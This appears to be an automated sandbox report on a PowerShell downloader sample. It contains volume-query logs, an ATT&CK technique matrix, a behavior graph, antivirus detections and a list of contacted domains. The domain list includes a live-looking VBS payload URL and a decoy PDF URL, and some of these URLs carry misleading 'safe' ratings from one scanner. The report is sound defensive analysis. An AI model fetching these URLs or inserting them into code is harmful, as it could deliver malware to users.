      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      PowerShell      		1
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578228 Sample: 1M1QoJF40r.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 84 26 x1.i.lencr.org 2->26 28 www.bluemaxxlaser.com 2->28 30 5 other IPs or domains 2->30 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Powershell download and execute 2->42 44 3 other signatures 2->44 9 powershell.exe 16 23 2->9         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 32 www.bluemaxxlaser.com 203.175.174.69, 49721, 80 SGGS-AS-APSGGSSG Singapore 9->32 34 astenterprises.com.pk 107.161.23.150, 443, 49710 RAMNODEUS United States 9->34 46 Powershell creates an autostart link 9->46 15 powershell.exe 23 9->15         started        18 Acrobat.exe 18 75 9->18         started        20 conhost.exe 9->20         started        36 127.0.0.1 unknown unknown 13->36 signatures6 process7 signatures8 48 Loading BitLocker PowerShell Module 15->48 22 AcroCEF.exe 106 18->22         started        process9 process10 24 AcroCEF.exe 22->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      1M1QoJF40r.ps141%VirustotalBrowse
      1M1QoJF40r.ps134%ReversingLabsScript-PowerShell.Downloader.Boxter
      1M1QoJF40r.ps1100%AviraTR/PShell.Dldr.VPA

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.astpw4ntpw4rprispw4s.com.pk/ms/List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.p0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
      http://www.blupw4maxxlaspw4r.com/ms/ms.vbs0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        astenterprises.com.pk
        		107.161.23.150
        		truefalse
          		high
          www.bluemaxxlaser.com
          		203.175.174.69
          		truefalse
            		high
            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
            		84.201.211.18
            		truefalse
              		high
              x1.i.lencr.org
              		unknown
              		unknownfalse
                		high
                www.astenterprises.com.pk
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.astpw4ntpw4rprispw4s.com.pk/ms/List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.ppowershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
